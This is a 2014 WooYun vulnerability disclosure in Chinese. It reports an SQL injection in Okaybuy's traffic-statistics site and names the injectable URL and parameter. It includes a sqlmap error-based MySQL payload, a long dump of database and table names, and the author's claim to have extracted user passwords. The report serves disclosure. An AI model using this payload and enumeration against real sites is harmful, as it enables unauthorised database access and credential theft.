当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066036

漏洞标题:好乐买某平台Sql注入+弱口令(涉及主站及后台)

相关厂商:好乐买

漏洞作者: 路人甲

提交时间:2014-06-24 13:42

修复时间:2014-08-08 13:44

公开时间:2014-08-08 13:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看看你们的站是大厂商 还是小厂商

详细说明:

0x01.注入 http://traffic.okaybuy.com.cn/ip_dst.php?site=1%27

222.png


sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: site
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: site=1' AND (SELECT 2989 FROM(SELECT COUNT(*),CONCAT(0x7162687771,(SELECT (CASE WHEN (2989=2989) THEN 1 ELSE 0 END)),0x7162677371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pwoh'='pwoh
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] OkayBuyCount
[*] test


web application technology: Apache
back-end DBMS: MySQL 5.0
Database: OkayBuyCount
[483 tables]
+---------------------------+
| Admin |
| Config |
| HisData |
| IPData |
| IPHis |
| IPPV |
| MediaPic |
| Shop |
| Shop_utf8 |
| Traffic |
| Traffic_20130926_20131210 |
| 13-01-01 |
| 13-01-02 |
| 13-01-03 |
| 13-01-04 |
| 13-01-05 |
| 13-01-06 |
| 13-01-07 |
| 13-01-08 |
| 13-01-09 |
| 13-01-10 |
| 13-01-11 |
| 13-01-12 |
| 13-01-13 |
| 13-01-14 |
| 13-01-15 |
| 13-01-16 |
| 13-01-17 |
| 13-01-18 |
| 13-01-19 |
| 13-01-20 |
| 13-01-21 |
| 13-01-22 |
| 13-01-23 |
| 13-01-24 |
| 13-01-25 |
| 13-01-26 |
| 13-01-27 |
| 13-01-28 |
| 13-01-29 |
| 13-01-30 |
| 13-01-31 |
| 13-02-01 |
| 13-02-02 |
| 13-02-03 |
| 13-02-04 |
| 13-02-05 |
| 13-02-06 |
| 13-02-07 |
| 13-02-08 |
| 13-02-09 |
| 13-02-10 |
| 13-02-11 |
| 13-02-12 |
| 13-02-13 |
| 13-02-14 |
| 13-02-15 |
| 13-02-16 |
| 13-02-17 |
| 13-02-18 |
| 13-02-19 |
| 13-02-20 |
| 13-02-21 |
| 13-02-22 |
| 13-02-23 |
| 13-02-24 |
| 13-02-25 |
| 13-02-26 |
| 13-02-27 |
| 13-02-28 |
| 13-03-01 |
| 13-03-02 |
| 13-03-03 |
| 13-03-04 |
| 13-03-05 |
| 13-03-06 |
| 13-03-07 |
| 13-03-08 |
| 13-03-09 |
| 13-03-10 |
| 13-03-11 |
| 13-03-12 |
| 13-03-13 |
| 13-03-14 |
| 13-03-15 |
| 13-03-16 |
| 13-03-17 |
| 13-03-18 |
| 13-03-19 |
| 13-03-20 |
| 13-03-21 |
| 13-03-22 |
| 13-03-23 |
| 13-03-24 |
| 13-03-25 |
| 13-03-26 |
| 13-03-27 |
| 13-03-28 |
| 13-03-29 |
| 13-03-30 |
| 13-03-31 |
| 13-04-01 |
| 13-04-02 |
| 13-04-03 |
| 13-04-04 |
| 13-04-05 |
| 13-04-06 |
| 13-04-07 |
| 13-04-08 |
| 13-04-09 |
| 13-04-10 |
| 13-04-11 |
| 13-04-12 |
| 13-04-13 |
| 13-04-14 |
| 13-04-15 |
| 13-04-16 |
| 13-04-17 |
| 13-04-18 |
| 13-04-19 |
| 13-04-20 |
| 13-04-21 |
| 13-04-22 |
| 13-04-23 |
| 13-04-24 |
| 13-04-25 |
| 13-04-26 |
| 13-04-27 |
| 13-04-28 |
| 13-04-29 |
| 13-04-30 |
| 13-05-01 |
| 13-05-02 |
| 13-05-03 |
| 13-05-04 |
| 13-05-05 |
| 13-05-06 |
| 13-05-07 |
| 13-05-08 |
| 13-05-09 |
| 13-05-10 |
| 13-05-11 |
| 13-05-12 |
| 13-05-13 |
| 13-05-14 |
| 13-05-15 |
| 13-05-16 |
| 13-05-17 |
| 13-05-18 |
| 13-05-19 |
| 13-05-20 |
| 13-05-21 |
| 13-05-22 |
| 13-05-23 |
| 13-05-24 |
| 13-05-25 |
| 13-05-26 |
| 13-05-27 |
| 13-05-28 |
| 13-05-29 |
| 13-05-30 |
| 13-05-31 |
| 13-06-01 |
| 13-06-02 |
| 13-06-03 |
| 13-06-04 |
| 13-06-05 |
| 13-06-06 |
| 13-06-07 |
| 13-06-08 |
| 13-06-09 |
| 13-06-10 |
| 13-06-11 |
| 13-06-12 |
| 13-06-13 |
| 13-06-14 |
| 13-06-15 |
| 13-06-16 |
| 13-06-17 |
| 13-06-18 |
| 13-06-19 |
| 13-06-20 |
| 13-06-21 |
| 13-06-22 |
| 13-06-23 |
| 13-06-24 |
| 13-06-25 |
| 13-06-26 |
| 13-06-27 |
| 13-06-28 |
| 13-06-29 |
| 13-06-30 |
| 13-07-01 |
| 13-07-02 |
| 13-07-03 |
| 13-07-04 |
| 13-07-05 |
| 13-07-06 |
| 13-07-07 |
| 13-07-08 |
| 13-07-09 |
| 13-07-10 |
| 13-07-11 |
| 13-07-12 |
| 13-07-13 |
| 13-07-14 |
| 13-07-15 |
| 13-07-16 |
| 13-07-17 |
| 13-07-18 |
| 13-07-19 |
| 13-07-20 |
| 13-07-21 |
| 13-07-22 |
| 13-07-23 |
| 13-07-24 |
| 13-07-25 |
| 13-07-26 |
| 13-07-27 |
| 13-07-28 |
| 13-07-29 |
| 13-07-30 |
| 13-07-31 |
| 13-08-01 |
| 13-08-02 |
| 13-08-03 |
| 13-08-04 |
| 13-08-05 |
| 13-08-06 |
| 13-08-07 |
| 13-08-08 |
| 13-08-09 |
| 13-08-10 |
| 13-08-11 |
| 13-08-12 |
| 13-08-13 |
| 13-08-14 |
| 13-08-15 |
| 13-08-16 |
| 13-08-17 |
| 13-08-18 |
| 13-08-19 |
| 13-08-20 |
| 13-08-21 |
| 13-08-22 |
| 13-08-23 |
| 13-08-24 |
| 13-08-25 |
| 13-08-26 |
| 13-08-27 |
| 13-08-28 |
| 13-08-29 |
| 13-08-30 |
| 13-08-31 |
| 13-09-01 |
| 13-09-02 |
| 13-09-03 |
| 13-09-04 |
| 13-09-05 |
| 13-09-06 |
| 13-09-07 |
| 13-09-08 |
| 13-09-09 |
| 13-09-10 |
| 13-09-11 |
| 13-09-12 |
| 13-09-13 |
| 13-09-14 |
| 13-09-15 |
| 13-09-16 |
| 13-09-17 |
| 13-09-18 |
| 13-09-19 |
| 13-09-20 |
| 13-09-21 |
| 13-09-22 |
| 13-09-23 |
| 13-09-24 |
| 13-09-25 |
| 13-09-26 |
| 13-12-10 |
| 13-12-11 |
| 13-12-12 |
| 13-12-13 |
| 13-12-14 |
| 13-12-15 |
| 13-12-16 |
| 13-12-17 |
| 13-12-18 |
| 13-12-19 |
| 13-12-20 |
| 13-12-21 |
| 13-12-22 |
| 13-12-23 |
| 13-12-24 |
| 13-12-25 |
| 13-12-26 |
| 13-12-27 |
| 13-12-28 |
| 13-12-29 |
| 13-12-30 |
| 13-12-31 |
| 14-01-01 |
| 14-01-02 |
| 14-01-03 |
| 14-01-04 |
| 14-01-05 |
| 14-01-06 |
| 14-01-07 |
| 14-01-08 |
| 14-01-09 |
| 14-01-10 |
| 14-01-11 |
| 14-01-12 |
| 14-01-13 |
| 14-01-14 |
| 14-01-15 |
| 14-01-16 |
| 14-01-17 |
| 14-01-18 |
| 14-01-19 |
| 14-01-20 |
| 14-01-21 |
| 14-01-22 |
| 14-01-23 |
| 14-01-24 |
| 14-01-25 |
| 14-01-26 |
| 14-01-27 |
| 14-01-28 |
| 14-01-29 |
| 14-01-30 |
| 14-01-31 |
| 14-02-01 |
| 14-02-02 |
| 14-02-03 |
| 14-02-04 |
| 14-02-05 |
| 14-02-06 |
| 14-02-07 |
| 14-02-08 |
| 14-02-09 |
| 14-02-10 |
| 14-02-11 |
| 14-02-12 |
| 14-02-13 |
| 14-02-14 |
| 14-02-15 |
| 14-02-16 |
| 14-02-17 |
| 14-02-18 |
| 14-02-19 |
| 14-02-20 |
| 14-02-21 |
| 14-02-22 |
| 14-02-23 |
| 14-02-24 |
| 14-02-25 |
| 14-02-26 |
| 14-02-27 |
| 14-02-28 |
| 14-03-01 |
| 14-03-02 |
| 14-03-03 |
| 14-03-04 |
| 14-03-05 |
| 14-03-06 |
| 14-03-07 |
| 14-03-08 |
| 14-03-09 |
| 14-03-10 |
| 14-03-11 |
| 14-03-12 |
| 14-03-13 |
| 14-03-14 |
| 14-03-15 |
| 14-03-16 |
| 14-03-17 |
| 14-03-18 |
| 14-03-19 |
| 14-03-20 |
| 14-03-21 |
| 14-03-22 |
| 14-03-23 |
| 14-03-24 |
| 14-03-25 |
| 14-03-26 |
| 14-03-27 |
| 14-03-28 |
| 14-03-29 |
| 14-03-30 |
| 14-03-31 |
| 14-04-01 |
| 14-04-02 |
| 14-04-03 |
| 14-04-04 |
| 14-04-05 |
| 14-04-06 |
| 14-04-07 |
| 14-04-08 |
| 14-04-09 |
| 14-04-10 |
| 14-04-11 |
| 14-04-12 |
| 14-04-13 |
| 14-04-14 |
| 14-04-15 |
| 14-04-16 |
| 14-04-17 |
| 14-04-18 |
| 14-04-19 |
| 14-04-20 |
| 14-04-21 |
| 14-04-22 |
| 14-04-23 |
| 14-04-24 |
| 14-04-25 |
| 14-04-26 |
| 14-04-27 |
| 14-04-28 |
| 14-04-29 |
| 14-04-30 |
| 14-05-01 |
| 14-05-02 |
| 14-05-03 |
| 14-05-04 |
| 14-05-05 |
| 14-05-06 |
| 14-05-07 |
| 14-05-08 |
| 14-05-09 |
| 14-05-10 |
| 14-05-11 |
| 14-05-12 |
| 14-05-13 |
| 14-05-14 |
| 14-05-15 |
| 14-05-16 |
| 14-05-17 |
| 14-05-18 |
| 14-05-19 |
| 14-05-20 |
| 14-05-21 |
| 14-05-22 |
| 14-05-23 |
| 14-05-24 |
| 14-05-25 |
| 14-05-26 |
| 14-05-27 |
| 14-05-28 |
| 14-05-29 |
| 14-05-30 |
| 14-05-31 |
| 14-06-01 |
| 14-06-02 |
| 14-06-03 |
| 14-06-04 |
| 14-06-05 |
| 14-06-06 |
| 14-06-07 |
| 14-06-08 |
| 14-06-09 |
| 14-06-10 |
| 14-06-11 |
| 14-06-12 |
| 14-06-13 |
| 14-06-14 |
| 14-06-15 |
| 14-06-16 |
| 14-06-17 |
| 14-06-18 |
| 14-06-19 |
| 14-06-20 |
| 14-06-21 |
| 14-06-22 |
| 14-06-23 |
| day_postion_order |
| day_postion_tj |
| shop_close |
| tb_cliporder |
| tb_daystat |
| tb_mideaexp |
| temptable_nuomicount |
+---------------------------+


漏洞证明:

asd.png


#我只是把这个统计平台的用户密码跑出来了

修复方案:

你们的库很有个性。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-08-08 16:31 | 暗影侠客 ( 路人 | Rank:4 漏洞数:5 | xss,inject,ctrf)

    为什么说会涉及主站与后台?这个是他们的用户轨迹跟踪系统!